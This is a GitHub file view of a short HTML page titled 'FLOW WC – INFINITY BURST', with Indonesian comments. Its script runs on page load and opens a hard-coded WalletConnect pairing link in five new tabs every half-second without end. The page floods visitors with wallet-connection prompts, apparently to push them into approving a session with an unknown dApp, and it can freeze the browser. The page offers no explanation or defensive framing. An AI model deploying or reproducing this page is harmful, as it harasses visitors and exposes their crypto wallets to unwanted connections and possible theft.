-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfinal.html
More file actions
39 lines (36 loc) · 955 Bytes
/
final.html
File metadata and controls
39 lines (36 loc) · 955 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<!doctype html>
<html lang="id">
<head>
<meta charset="utf-8" />
<title>FLOW WC – INFINITY BURST</title>
</head>
<body>
<script>
const deeplink =
"wc:75e7fb2068b7f9abc94761cf72e93cbbf8d1804d044f38b9b7e695b89193d421@2" +
"?relay-protocol=irn" +
"&symKey=3f316b05f1ba3bd669097bb81f16fba67c2ffb503745363e292cfbcf73ef62cc" +
"&methods=[wc_sessionPropose]" +
"&expiryTimestamp=1893456000";
function openOnce() {
const a = document.createElement("a");
a.href = deeplink;
a.target = "_blank";
a.rel = "noopener noreferrer";
document.body.appendChild(a);
a.click();
a.remove();
}
function burst() {
// 5 tab per siklus
for (let i = 0; i < 5; i++) {
setTimeout(openOnce, i * 80);
}
// ulangi terus
setTimeout(burst, 500);
}
// langsung jalan begitu halaman dimuat
window.onload = burst;
</script>
</body>
</html>